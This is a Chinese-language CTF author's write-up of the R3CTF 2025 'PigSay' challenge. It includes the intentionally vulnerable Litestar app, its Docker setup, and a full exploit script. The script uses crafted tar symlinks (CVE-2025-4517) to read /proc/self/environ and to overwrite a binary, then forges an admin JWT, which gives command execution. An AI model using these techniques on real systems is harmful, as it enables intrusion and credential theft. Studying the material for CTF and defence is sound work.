前言
很荣幸受邀参与 R3CTF 2025 的出题工作,这次出了一道 Misc & Web 类的赛题 PigSay。
本文记录了自己的出题过程和本题的解题思路。
出题过程
出题的过程比较的波折,空白大哥的本意是让咱们考虑考虑有啥 pyjail 的新玩法(3.14、3.15之类的新特性),群里也讨论到了 t-string 等新特性,但是我粗略看了看貌似没啥好的利用方式,于是就去瞅了瞅 docs.python.org 官方的更新公告。
看完了 python 3.14 的更新公告,发现了 tarfile 有个 CVE-2025-4138 写在了更新公告中,去看了看 github 上的 commit记录,发现一并上报的 CVE 还有好几个,其中看了下 CVE-2025-4517 的描述,居然有任意文件写的能力!出题思路这不就来了吗?
在复现 CVE-2025-4517
的过程中,自己也摸索出了 tarfile extract 软链接导致的任意文件读,于是一个 tarfile 的 extract 函数就能够有文件读写的能力了,配合一个 AI 生成的类似 佛曰
的 Web,一道简单的签到题就出来了?!(但是貌似看比赛的数据不是很能签到...)
注:python 在 3.14.0b3
版本已修复 CVE-2025-4517,所以本题用的 docker image 是 python:3.14.0b2-alpine3.21
app.py
整个题目其实就靠这一个 py 文件运行,没啥好谈的,一个考点是 litestar
默认会生成 openapi 文档,在 /schema
路径。配合这个点,就能获取 /api/admin/upgrade/{uuid4().hex}
的路径了!
最主要的利用点就是 tarfile
调用 extractall
函数。干扰项就是加上 zip、7z、rar 这三个压缩方法,但是加上了 rar 后,赛后看其他队伍的 WP,发现了 rar 也有文件读写的 CVE,被狠狠的非预期了 :(
app.py 的源码如下
#!/usr/bin/env python
from importlib import reload
from os import environ
from pathlib import Path
from subprocess import check_output
from tempfile import NamedTemporaryFile, TemporaryDirectory
from uuid import uuid4
import jwt
import pigsay
import uvicorn
from litestar import Litestar, get, post
from litestar.datastructures import UploadFile
from litestar.params import Body
from litestar.static_files import create_static_files_router
JWT_KEY = environ.pop("JWT_KEY").encode()
PIG_KEY = environ.pop("PIG_KEY").encode()
converter = pigsay.PigConverter(PIG_KEY)
@get("/api/ping")
async def ping() -> dict[str, str]:
"""
Ping? Pong!
"""
return {"code": 20000, "msg": "pong"}
@post("/api/encrypt")
async def encrypt(data: dict) -> dict[str, str]:
"""
Encrypt some text to pigsay text.
"""
try:
ret = converter.encrypt_string(str(data["text"]))
return {"code": 20000, "msg": "encrypt success", "data": ret}
except Exception as e:
return {"code": 50000, "msg": f"encrypt error: {e}"}
@post("/api/decrypt")
async def decrypt(data: dict) -> dict[str, str]:
"""
Decrypt some pigsay text.
"""
try:
ret = converter.decrypt_string(str(data["text"]))
return {"code": 20000, "msg": "decrypt success", "data": ret}
except Exception as e:
return {"code": 50000, "msg": f"decrypt error: {e}"}
def check_file_type(filename: str):
allows = [".zip", ".rar", ".7z", ".tar.gz"]
return any([filename.endswith(allow) for allow in allows])
def uncompress_file(filepath: str, handler: callable):
file = Path(filepath)
suffix = "".join(file.suffixes)
with TemporaryDirectory(uuid4().hex) as tmp_dir:
tmp_dir = Path(tmp_dir)
try:
args = (filepath, str(tmp_dir.absolute()))
match suffix:
case ".zip":
unzip_file(*args)
case ".rar":
unrar_file(*args)
case ".7z":
un7z_file(*args)
case ".tar.gz":
untar_file(*args)
case _:
raise Exception(f"Unsupported file type: {suffix}")
return {
"code": 20000,
"msg": "success",
"data": {
item.name: handler(item.read_text())
for item in tmp_dir.glob("*.txt")
},
}
except Exception as e:
return {"code": 50000, "msg": f"Uncompress file error: {e}"}
def unzip_file(filepath: str, extract_to_filepath: str):
import zipfile
with zipfile.ZipFile(filepath) as zf:
zf.extractall(extract_to_filepath)
def unrar_file(filepath: str, extract_to_filepath: str):
import rarfile
with rarfile.RarFile(filepath) as rf:
rf.extractall(extract_to_filepath)
def un7z_file(filepath: str, extract_to_filepath: str):
import py7zr
with py7zr.SevenZipFile(filepath) as sf:
sf.extractall(extract_to_filepath)
def untar_file(filepath: str, extract_to_filepath: str):
import tarfile
with tarfile.open(filepath, "r:gz") as tf:
tf.extractall(extract_to_filepath)
@post("/api/file/encrypt", request_max_body_size=1024 * 1024)
async def encrypt_file(
data: UploadFile = Body(media_type="multipart/form-data"),
) -> dict[str, str]:
"""
We can encrypt some txt file in a compressed file
"""
filename = data.filename
if not check_file_type(filename):
return {"code": 40000, "msg": "Invalid file type"}
content = await data.read()
try:
with NamedTemporaryFile(mode="wb", suffix=filename) as tmp:
tmp.write(content)
tmp.seek(0)
return uncompress_file(tmp.name, converter.encrypt_string)
except Exception as e:
return {"code": 50000, "msg": f"Encrypt file error: {e}"}
@post("/api/file/decrypt", request_max_body_size=1024 * 1024)
async def decrypt_file(
data: UploadFile = Body(media_type="multipart/form-data"),
) -> dict[str, str]:
"""
We can decrypt some txt file in a compressed file
"""
filename = data.filename
if not check_file_type(filename):
return {"code": 40000, "msg": "Invalid file type"}
content = await data.read()
try:
with NamedTemporaryFile(mode="wb", suffix=filename) as tmp:
tmp.write(content)
tmp.seek(0)
return uncompress_file(tmp.name, converter.decrypt_string)
except Exception as e:
return {"code": 50000, "msg": f"Encrypt file error: {e}"}
@post(f"/api/admin/upgrade/{uuid4().hex}")
async def upgrade(headers: dict) -> dict[str, str]:
"""
Only admin can do!
"""
token = headers.get("r3-token")
if not token:
return {"code": 40300, "msg": "Authentication Failed"}
try:
if jwt.decode(token, JWT_KEY, algorithms=["HS256"]).get("role") != "admin":
return {"code": 40300, "msg": "Permission Denied"}
except Exception:
return {"code": 40300, "msg": "Authentication Error"}
try:
ret = (
check_output(
["/app/upgrade.sh"],
env=None,
universal_newlines=True,
timeout=60,
user="r3ctf",
)
.strip()
.replace("\n", ", ")
)
reload(pigsay)
global converter
converter = pigsay.PigConverter(PIG_KEY)
return {"code": 20000, "msg": "Upgrade successfully", "data": ret}
except Exception as e:
return {"code": 50000, "msg": "Upgrade failed", "data": str(e)}
app = Litestar(
route_handlers=[
ping,
encrypt,
decrypt,
encrypt_file,
decrypt_file,
upgrade,
create_static_files_router(path="/static", directories=["static"]),
create_static_files_router(path="/", directories=["public"], html_mode=True),
],
)
uvicorn.run(app, host="0.0.0.0", port=8000)
upgrade.sh
关键的利用脚本,这个脚本在 Dockerfile 中被设置了不可写,只能读和执行,目的是防止这个脚本被覆盖从而任意命令执行了,得让选手再找一个可以写的文件进行利用。
整个脚本只是用了 uv
和 uvx
,这两个文件也都是不可写的,所以可以 strace
看看 uv add
和 uvx pigsay
到底执行了什么。
预期的解法就是 uvx pigsay
执行的时候,其实是执行 /home/r3ctf/.local/share/uv/tools/pigsay/bin/pigsay
这个文件,而这个文件是可以写入的,所以覆盖这个文件后,调用 uvx pigsay ...
就会执行覆盖后的命令。
#!/bin/sh
cd /app
if uv add -U pigsay && uv tool upgrade pigsay; then
uvx pigsay encrypt "[$(date "+%Y-%m-%d %H:%M:%S")] Upgrade Success!"
else
uvx pigsay encrypt "[$(date "+%Y-%m-%d %H:%M:%S")] Upgrade failed!"
fi
start.sh
这个启动文件没啥好说的,主要是适配平台的环境变量和做一些权限控制。以及设置随机 flag文件名
和 JWT_KEY
。
#!/bin/sh
echo $FLAG > /app/flag_$(python -c 'import uuid; print(uuid.uuid4().hex)') && \
chmod 744 /app/flag_*
unset FLAG
export FLAG=R3CTF{fake_flag}
FLAG=R3CTF{fake_flag}
rm -rf $0
su -s /bin/sh r3ctf -c \
'JWT_KEY=$(python -c "import uuid; print(uuid.uuid4().hex)") PIG_KEY=$(python -c "import uuid; print(uuid.uuid4().hex)") uv run app.py'
Dockerfile
除了 uv 相关的操作,其他都是 root 用户执行的,避免一些非预期。
FROM python:3.14.0b2-alpine3.21
COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/
WORKDIR /app
RUN apk add --no-cache gcc musl-dev linux-headers
RUN addgroup -S r3ctf && \
adduser -S r3ctf -G r3ctf -s /bin/sh && \
chown r3ctf:r3ctf /app
COPY start.sh /start.sh
COPY app.py /app/
COPY upgrade.sh /app/
COPY pyproject.toml /app/
COPY public /app/public/
COPY static /app/static/
RUN chmod 755 /start.sh && \
chmod 744 /app/app.py && \
chmod 755 /app/upgrade.sh
USER r3ctf
RUN uv tool install pigsay && uv sync
USER root
ENTRYPOINT ["/start.sh"]
前端文件
这里就不贴出来了,我是直接使用 v0.dev 生成的,prompt如下:
第一轮:
使用原生HTML、CSS、JS实现一个在线加密解密的网站,访问后端 /api/encrypt 和 /api/decrypt 分别实现加解密,访问 /api/file/encrypt 和 /api/file/decrypt 可以上传 .zip .rar .tar.gz .7z 类型的压缩文件,进行文本批量加密解密。要求:界面优美,只使用原生html、css、js,能支持文本的加密解密也支持压缩包上传获取加密解密结果。界面的标题是 PigSay Encrypt/Decrypt Tool ,描述为 Secure text transformation with PigSay algorithm
第二轮:
/api/file/encrypt 和 /api/file/decrypt 文件上传类型的加密解密,返回的格式是一个json,格式是
{
"code": 20000,
"msg": "success",
"data": {
"encrypt.txt": "解密后的内容",
"encrypt2.txt": "解密后的内容2"
}
}
生成的效果非常好,小改了一下就直接用了(AI还是太强了
解题思路
其实如果 get 到了 Dockerfile 中的 JWT_KEY 环境变量,就知道肯定要读 /proc/self/environ (或者执行 env),结合 tarfile 的任意文件读,显然是前者,软连接的方式很轻松就可以获取 JWT_KEY。
随后配合 /schema
泄漏的路径,就可以调用 upgrade
函数了。
最关键的一点,一旦知道了 CVE-2025-4517 能够写文件,那么就可以覆盖 /home/r3ctf/.local/share/uv/tools/pigsay/bin/pigsay
从而执行任意命令了。
CVE-2025-4517 的 POC 我是参考 GitHub 上官方的测试代码。
最后的 exp.py
脚本如下:
#!/usr/bin/env python
import os
import re
import tarfile
from io import BytesIO
from traceback import print_exc
import jwt
import requests
url = "http://127.0.0.1:8000"
# url = "http://s1.r3.ret.sh.cn:32497"
def decrypt(enc: str):
req = requests.post(
f"{url}/api/decrypt",
json={
"text": enc,
},
)
resp = req.json()
return resp["data"]
def read_file(filename: str):
try:
with tarfile.open("./read.tar.gz", "w:gz") as tar:
def addmemb(name, **kwargs):
memb = tarfile.TarInfo(name)
for k, v in kwargs.items():
getattr(memb, k)
setattr(memb, k, v)
tar.addfile(memb)
addmemb("a/", type=tarfile.SYMTYPE, linkname="../")
addmemb("b/", type=tarfile.SYMTYPE, linkname="a/../../")
addmemb("data.txt/", type=tarfile.SYMTYPE, linkname=f"b{filename}")
req = requests.post(
f"{url}/api/file/encrypt", files={"file": open("./read.tar.gz", "rb")}
)
resp = req.json()
data_enc = resp["data"]["data.txt"]
data_str = decrypt(data_enc)
return data_str
except Exception:
print_exc()
finally:
os.remove("./read.tar.gz")
def write_file(filename: str, content: str):
"""
https://github.com/python/cpython/blob/3612d8f51741b11f36f8fb0494d79086bac9390a/Lib/test/test_tarfile.py#L3791
"""
try:
with tarfile.open("./write.tar.gz", "w:gz") as tar:
def addmemb(name, **kwargs):
memb = tarfile.TarInfo(name)
fileobj = None
for k, v in kwargs.items():
if k == "content":
content = v
content = content.encode()
memb.size = len(content)
fileobj = BytesIO(content)
else:
setattr(memb, k, v)
tar.addfile(memb, fileobj)
# docker alpine image has 4096
# assert "PC_PATH_MAX" in os.pathconf_names
# max_path_len = os.pathconf("/app", "PC_PATH_MAX")
max_path_len = 4096
steps = "abcdefghijklmnop"
path_sep_len = 1
# # TemporaryDirectory len + uuid len + self path len
dest_len = 11 + 32 + path_sep_len
component_len = (max_path_len - dest_len) // (len(steps) + path_sep_len)
component = "d" * component_len
path = ""
step_path = ""
for i in steps:
addmemb(os.path.join(path, component), type=tarfile.DIRTYPE, mode=0o777)
addmemb(os.path.join(path, i), type=tarfile.SYMTYPE, linkname=component)
path = os.path.join(path, component)
step_path = os.path.join(step_path, i)
linkpath = os.path.join(*steps, "l" * 254)
parent_segments = [".."] * len(steps)
addmemb(
linkpath,
type=tarfile.SYMTYPE,
linkname=os.path.join(*parent_segments),
)
addmemb(
"escape",
type=tarfile.SYMTYPE,
linkname=os.path.join(linkpath, "../"),
)
addmemb(
"data.txt",
type=tarfile.LNKTYPE,
linkname=os.path.join("escape", ".." + filename),
)
addmemb(
"data.txt",
content=content,
mode=0o777,
)
req = requests.post(
f"{url}/api/file/encrypt", files={"file": open("./write.tar.gz", "rb")}
)
resp = req.json()
data_enc = resp["data"]["data.txt"]
data_str = decrypt(data_enc)
return data_str
except Exception:
print_exc()
finally:
os.remove("./write.tar.gz")
def exec_upgrade_sh(jwt_key: str):
req = requests.get(f"{url}/schema")
resp = req.text
uuid = re.search(r'"/api/admin/upgrade/([a-z0-9]+?)"', resp).group(1)
token = jwt.encode(
{"role": "admin", "username": "woodwhale"},
key=jwt_key,
algorithm="HS256",
)
upgrade_api = f"{url}/api/admin/upgrade/{uuid}"
req = requests.post(upgrade_api, headers={"r3-token": token})
resp = req.json()
print(resp)
return resp["data"]
def main():
print("[DEBUG]", "read file...")
env = read_file("/proc/self/environ")
print(f"{env=}")
print("[DEBUG]", "write file...")
write_file(
"/home/r3ctf/.local/share/uv/tools/pigsay/bin/pigsay",
'#!/bin/sh\necho -e "flag: $(cat /app/flag*)"',
)
print("[DEBUG]", "exec sh...")
flag = exec_upgrade_sh(re.search(r"JWT_KEY=([^\n]+?)\x00", env).group(1))
print("[INFO]", flag)
if __name__ == "__main__":
main()
后话
其实这道题预期的难度是 medium
,和队里其他大哥出的题目简直不是一个等级的。
但是最后也没有几队解出来,可能是出题出的太谜语人了...
下次争取搞点更好玩更具挑战性的题目 :)
附录
截止目前在discord上分享本题的题解:
Q7:
Read: ln -sf /proc/self/environ test.txt; rar a -m0 -ol exp.rar test.txt
Write: CVE-2025-4517
---
大佬就是大佬,两句话完事!
USDK:
R3CTF 2025 - Pigsay Challenge Misc Writeup
https://umbertosavoia.github.io/posts/R3CTF-2025-Pigsay-challenge-Misc/
---
没看这个WP之前,我都没想过rar居然也能写文件,tql